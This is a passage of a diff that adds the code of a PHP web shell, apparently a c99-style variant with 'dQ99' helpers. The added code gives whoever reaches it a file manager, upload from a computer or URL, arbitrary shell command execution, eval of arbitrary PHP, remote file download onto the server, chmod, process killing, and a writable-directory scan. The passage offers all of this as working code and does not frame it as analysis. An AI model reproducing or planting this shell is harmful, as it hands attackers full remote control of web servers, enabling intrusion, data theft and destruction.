value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+    }
+  }
+}
+if ($act == "upload") {
+  $uploadmess = "";
+  $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+  if (empty($uploadpath)) {$uploadpath = $d;}
+  elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
+  if (!empty($submit)) {
+    global $_FILES;
+    $uploadfile = $_FILES["uploadfile"];
+    if (!empty($uploadfile["tmp_name"])) {
+      if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+      else {$destin = $userfilename;}
+      if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
+        $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
+      }
+      else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
+    }
+    else { echo "No file to upload!"; }
+  }
+  if ($miniform) {
+    echo "<b>".$uploadmess."</b>";
+    $act = "ls";
+  }
+  else {
+    echo "<table><tr><td colspan=2 class=barheader>".
+         ".: File Upload :.</td>".
+         "<td colspan=2>".$uploadmess."</td></tr>".
+         "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
+         "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
+         "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
+         "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
+         "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
+         "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
+         "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
+         "</form></td></tr></table>";
+  }
+}
+if ($act == "delete") {
+  $delerr = "";
+  foreach ($actbox as $v) {
+    $result = FALSE;
+    $result = fs_rmobj($v);
+    if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."<br>"; }
+  }
+  if (!empty($delerr)) { echo "<b>Error deleting:</b><br>".$delerr; }
+  $act = "ls";
+}
+if (!$usefsbuff) {
+  if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {
+    echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";
+  }
+}
+else {
+  if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); dQ99_sess_put($sess_data); $act = "ls"; }
+  elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); dQ99_sess_put($sess_data); $act = "ls";}
+  elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} dQ99_sess_put($sess_data); $act = "ls";}
+  if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); dQ99_sess_put($sess_data);}
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    dQ99_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+    $act = "ls";
+  }
+  elseif ($actarcbuff) {
+    $arcerr = "";
+    if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+    else {$ext = ".tar.gz";}
+    if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+    $cmdline .= " ".$actarcbuff_path;
+    $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+    foreach($objects as $v) {
+      $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+      if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+      if (is_dir($v)) {
+        if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+        $v .= "*";
+      }
+      $cmdline .= " ".$v;
+    }
+    $tmp = realpath(".");
+    chdir($d);
+    $ret = dQ99exec($cmdline);
+    chdir($tmp);
+    if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+    $ret = str_replace("\r\n","\n",$ret);
+    $ret = explode("\n",$ret);
+    if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+    foreach($sess_data["cut"] as $k=>$v) {
+      if (in_array($v,$ret)) {fs_rmobj($v);}
+      unset($sess_data["cut"][$k]);
+    }
+    dQ99_sess_put($sess_data);
+    if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+    $act = "ls";
+  }
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    dQ99_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Error pasting:</b><br>".$psterr;}
+    $act = "ls";
+  }
+}
+if ($act == "cmd") {
+  @chdir($chdir);
+  if (!empty($submit)) {
+    echo "<div class=barheader>.: Results of Execution :.</div>\n";
+    $olddir = realpath(".");
+    @chdir($d);
+    $ret = dQ99exec($cmd);
+    $ret = convert_cyr_string($ret,"d","w");
+    if ($cmd_txt) {
+      $rows = count(explode("\n",$ret))+1;
+      if ($rows < 10) { $rows = 10; } else { $rows = 30; }
+      $cols = 130;
+      echo "<textarea class=shell cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";
+      //echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
+    }
+    else { echo $ret."<br>"; }
+    @chdir($olddir);
+  }
+}
+if ($act == "ls") {
+  if (count($ls_arr) > 0) { $list = $ls_arr; }
+  else {
+    $list = array();
+    if ($h = @opendir($d)) {
+      while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+      closedir($h);
+    }
+  }
+  if (count($list) == 0) { echo "<div class=dQerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
+  else {
+    $objects = array();
+    $vd = "f"; //Viewing mode
+    if ($vd == "f") {
+      $objects["head"] = array();
+      $objects["folders"] = array();
+      $objects["links"] = array();
+      $objects["files"] = array();
+      foreach ($list as $v) {
+        $o = basename($v);
+        $row = array();
+        if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
+        elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
+        elseif (is_dir($v)) {
+          if (is_link($v)) {$type = "LINK";}
+          else {$type = "DIR";}
+          $row[] = $v;
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+        $row[] = filemtime($v);
+        if (!$win) {
+          $ow = posix_getpwuid(fileowner($v));
+          $gr = posix_getgrgid(filegroup($v));
+          $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+        }
+        $row[] = fileperms($v);
+        if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+        elseif (is_link($v)) {$objects["links"][] = $row;}
+        elseif (is_dir($v)) {$objects["folders"][] = $row;}
+        elseif (is_file($v)) {$objects["files"][] = $row;}
+        $i++;
+      }
+      $row = array();
+      $row[] = "<b>Name</b>";
+      $row[] = "<b>Size</b>";
+      $row[] = "<b>Date Modified</b>";
+      if (!$win) {$row[] = "<b>Owner/Group</b>";}
+      $row[] = "<b>Perms</b>";
+      $row[] = "<b>Action</b>";
+      $parsesort = parsesort($sort);
+      $sort = $parsesort[0].$parsesort[1];
+      $k = $parsesort[0];
+      if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+      $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+      $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+      $row[$k] .= $y;
+      for($i=0;$i<count($row)-1;$i++) {
+        if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+      }
+      $v = $parsesort[0];
+      usort($objects["folders"], "tabsort");
+      usort($objects["links"], "tabsort");
+      usort($objects["files"], "tabsort");
+      if ($parsesort[1] == "d") {
+        $objects["folders"] = array_reverse($objects["folders"]);
+        $objects["files"] = array_reverse($objects["files"]);
+      }
+      $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+      $tab = array();
+      $tab["cols"] = array($row);
+      $tab["head"] = array();
+      $tab["folders"] = array();
+      $tab["links"] = array();
+      $tab["files"] = array();
+      $i = 0;
+      foreach ($objects as $a) {
+        $v = $a[0];
+        $o = basename($v);
+        $dir = dirname($v);
+        if ($disp_fullpath) {$disppath = $v;}
+        else {$disppath = $o;}
+        $disppath = str2mini($disppath,60);
+        if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+        elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+        foreach ($regxp_highlight as $r) {
+          if (ereg($r[0],$o)) {
+            if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; dQ99shexit();}
+            else {
+              $r[1] = round($r[1]);
+              $isdir = is_dir($v);
+              if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
+                if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+                $disppath = $r[2].$disppath.$r[3];
+                if ($r[4]) {break;}
+              }
+            }
+          }
+        }
+        $uo = urlencode($o);
+        $ud = urlencode($dir);
+        $uv = urlencode($v);
+        $row = array();
+        if ($o == ".") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "CURDIR";
+        }
+        elseif ($o == "..") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "UPDIR";
+        }
+        elseif (is_dir($v)) {
+          if (is_link($v)) {
+            $disppath .= " => ".readlink($v);
+            $type = "LINK";
+            $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          else {
+            $type = "DIR";
+            $row[] =  "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {
+          $ext = explode(".",$o);
+          $c = count($ext)-1;
+          $ext = $ext[$c];
+          $ext = strtolower($ext);
+          $row[] =  "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$disppath."</a>";
+          $row[] = view_size($a[1]);
+        }
+        $row[] = @date("d.m.Y H:i:s",$a[2]);
+        if (!$win) { $row[] = $a[3]; }
+        $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+        if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+        else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+        if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;".$checkbox;}
+        else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" border=\"0\"></a>&nbsp;".$checkbox;}
+        if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+        elseif (is_link($v)) {$tab["links"][] = $row;}
+        elseif (is_dir($v)) {$tab["folders"][] = $row;}
+        elseif (is_file($v)) {$tab["files"][] = $row;}
+        $i++;
+      }
+    }
+    // Compiling table
+    $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+    echo "<div class=barheader>.: ";
+    if (!empty($dQ_infohead)) { echo $dQ_infohead; }
+    else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
+    echo " :.</div>\n";
+    echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
+         "<table class=explorer>";
+    foreach($table as $row) {
+      echo "<tr>";
+      foreach($row as $v) {echo "<td>".$v."</td>";}
+      echo "</tr>\r\n";
+    }
+    echo "</table>".
+         "<script>".
+         "function ls_setcheckboxall(status) {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
+         "}".
+         "function ls_reverse_all() {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
+         "}".
+         "</script>".
+         "<div align=\"right\">".
+         "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
+         "<img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+    if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
+      echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"dQ_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+    echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+    echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+    if ($usefsbuff) {
+      echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+      echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+      echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+    }
+    echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
+    echo "</form>";
+  }
+}
+if ($act == "tools") { tools(); }
+##[ PHP FILESYSTEM TRICKZ (By diKi) ]##
+if ($act == "phpfsys") { 
+  echo "<div align=left>";
+  $fsfunc = $phpfsysfunc;
+  if ($fsfunc=="copy") {
+    if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
+    else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
+  }
+  elseif ($fsfunc=="rename") {
+    if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
+    else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
+  }
+  elseif ($fsfunc=="chmod") {
+    if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
+    else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
+  }
+  elseif ($fsfunc=="read") {
+    $darg = $d.$arg1;
+    if ($hasil = @file_get_contents($darg)) {
+      echo "<b>Filename:</b> ".$darg."<br>";
+      echo "<center><textarea cols=135 rows=30>";
+      echo htmlentities($hasil);
+      echo "</textarea></center>\n";
+    }
+    else { echo "<div class=dQerrmsg> Couldn't open ".$darg."<div>"; }
+  }
+  elseif ($fsfunc=="write") {
+    $darg = $d.$arg1;
+    if(@file_put_contents($darg,$arg2)) {
+      echo "<b>Saved!</b> ".$darg;
+
+    }
+    else { echo "<div class=dQerrmsg>Can't write to $darg!</div>"; }
+  }
+  elseif ($fsfunc=="downloadbin") {
+    $handle = fopen($arg1, "rb");
+    $contents = '';
+    while (!feof($handle)) {
+      $contents .= fread($handle, 8192);
+    }
+    $r = @fopen($d.$arg2,'w');
+    if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+    else { echo "<div class=dQerrmsg>Can't write to ".$d.$arg2."!</div>"; }
+    fclose($r);
+    fclose($handle);
+  }
+  elseif ($fsfunc=="download") {
+    $text = implode('', file($arg1));
+    if ($text) {
+      $r = @fopen($d.$arg2,'w');
+      if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+      else { echo "<div class=dQerrmsg>Can't write to ".$d.$arg2."!</div>"; }
+      fclose($r);
+    }
+    else { echo "<div class=dQerrmsg>Can't download from $arg1!</div>";}
+  }
+  elseif ($fsfunc=='mkdir') {
+    $thedir = $d.$arg1;
+    if ($thedir != $d) {
+      if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
+      elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
+      else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
+    }
+    else { echo "Can't create current dir:<b> $thedir</b>"; }
+  }
+  elseif ($fsfunc=='fwritabledir') {
+    function recurse_dir($dir,$max_dir) {
+      global $dir_count;
+      $dir_count++;
+      if( $cdir = dir($dir) ) {
+        while( $entry = $cdir-> read() ) {
+          if( $entry != '.' && $entry != '..' ) {
+            if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
+             if ($dir_count > $max_dir) { return; }
+              echo "[".$dir_count."] ".$dir.$entry."\n";
+              recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
+            }
+          }
+        }
+        $cdir->close();
+      }
+    }
+    if (!$arg1) { $arg1 = $d; }
+    if (!$arg2) { $arg2 = 10; }
+    if (is_dir($arg1)) {
+      echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";
+      echo "<pre>";
+      recurse_dir($arg1,$arg2);
+      echo "</pre>";
+      $total = $dir_count - 1;
+      echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";
+    }
+    else {
+      echo "<div class=dQerrmsg>Directory is not exist or permission denied!</div>";
+    }
+  }
+  else {
+    if (!$arg1) { echo "<div class=dQerrmsg>No operation! Please fill parameter [A]!</div>\n"; }
+    else {
+      if ($hasil = $fsfunc($arg1)) {
+        echo "<b>Result of $fsfunc $arg1:</b><br>";
+        if (!is_array($hasil)) { echo "$hasil\n"; }
+        else {
+          echo "<pre>";
+          foreach ($hasil as $v) { echo $v."\n"; }
+          echo "</pre>";
+        }
+      }
+      else { echo "<div class=dQerrmsg>$fsfunc $arg1 failed!</div>\n"; }
+    }
+  }
+  echo "</div>\n";
+}
+if ($act == "processes") {
+  echo "<div class=barheader>.: Processes :.</div>\n";
+  if (!$win) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
+  else { $handler = "tasklist"; }
+  $ret = dQ99exec($handler);
+  if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
+  else {
+    if (empty($processes_sort)) { $processes_sort = $sort_default; }
+    $parsesort = parsesort($processes_sort);
+    if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+    $k = $parsesort[0];
+    if ($parsesort[1] != "a") {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+    }
+    else {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
+    }
+    $ret = htmlspecialchars($ret);
+    if (!$win) { //Not Windows
+      if ($pid) {
+        if (is_null($sig)) { $sig = 9; }
+        echo "Sending signal ".$sig." to #".$pid."... ";
+        if (posix_kill($pid,$sig)) { echo "OK."; } else { echo "ERROR."; }
+      }
+      while (ereg("  ",$ret)) { $ret = str_replace("  "," ",$ret); }
+      $stack = explode("\n",$ret);
+      $head = explode(" ",$stack[0]);
+      unset($stack[0]);
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) {
+          $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";
+        }
+      }
+      $head[$i] = "";
+      $prcs = array();
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          $line = explode(" ",$line);
+          $line[10] = join(" ",array_slice($line,10));
+          $line = array_slice($line,0,11);
+          if ($line[0] == get_current_user()) { $line[0] = "<font color=green>".$line[0]."</font>"; }
+          $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+          $prcs[] = $line;
+        }
+      }
+    }
+    //For Windows - Fixed By diKi
+    else {
+      while (ereg("  ",$ret)) { $ret = str_replace("  "," ",$ret); }
+      while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
+      $ret = convert_cyr_string($ret,"d","w");
+      $stack = explode("\n",$ret);
+      unset($stack[0],$stack[2]);
+      $stack = array_values($stack);
+      $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
+      $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
+      $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
+      $head = explode(" ",$stack[0]);
+      $stack = array_slice($stack,1);
+      $head = array_values($head);
+      if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
+      else { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
+      if ($k > count($head)) {$k = count($head)-1;}
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
+      }
+      $prcs = array();
+      unset($stack[0]);
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          $line = explode(" ",$line);
+          $line[4] = str_replace(".","",$line[4]);
+          $line[4] = intval($line[4]) * 1024;
+          unset($line[5]);
+          $prcs[] = $line;
+        }
+      }
+    }
+    $head[$k] = "<b>".$head[$k]."</b>".$y;
+    $v = $processes_sort[0];
+    usort($prcs,"tabsort");
+    if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
+    $tab = array();
+    $tab[] = $head;
+    $tab = array_merge($tab,$prcs);
+    echo "<table class=explorer>\n";
+    foreach($tab as $i=>$k) {
+      echo "<tr>";
+      foreach($k as $j=>$v) {
+        if ($win and $i > 0 and $j == 4) { $v = view_size($v); }
+        echo "<td>".$v."</td>";
+      }
+      echo "</tr>\n";
+    }
+    echo "</table>";
+  }
+}
+if ($act == "eval") {
+  if (!empty($eval)) {
+    echo "Result of execution this PHP-code:<br>";
+    $tmp = @ob_get_contents();
+    $olddir = realpath(".");
+    @chdir($d);
+    if ($tmp) {
+      @ob_clean();
+      eval($eval);
+      $ret = @ob_get_contents();
+      $ret = convert_cyr_string($ret,"d","w");
+      @ob_clean();
+      echo $tmp;
+      if ($eval_txt) {
+        $rows = count(explode("\r\n",$ret))+1;
+        if ($rows < 10) {$rows = 10;}
+        echo "<br><textarea cols=\"115\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+      }
+      else {echo $ret."<br>";}
+    }
+    else {
+      if ($eval_txt) {
+        echo "<br><textarea cols=\"115\" rows=\"15\" readonly>";
+        eval($eval);
+        echo "</textarea>";
+      }
+      else {echo $ret;}
+    }
+    @chdir($olddir);
+  }
+  else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+  echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"115\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f") {
+  echo "<div align=left>";
+  if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
+    if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+    else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+  }
+  else {
+    $r = @file_get_contents($d.$f);
+    $ext = explode(".",$f);
+    $c = count($ext)-1;
+    $ext = $ext[$c];
+    $ext = strtolower($ext);
+    $rft = "";
+    foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+    if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+    if (empty($ft)) {$ft = $rft;}
+    $arr = array(
+        array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+        array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+        array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+        array("Code","code"),
+        array("Session","phpsess"),
+        array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+        array("SDB","sdb"),
+        array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+        array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+        array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+        array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+        array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+    );
+    echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+    foreach($arr as $t) {
+      if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+      elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+      else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+      echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+    }
+    echo "<hr size=\"1\" noshade>";
+    if ($ft == "info") {
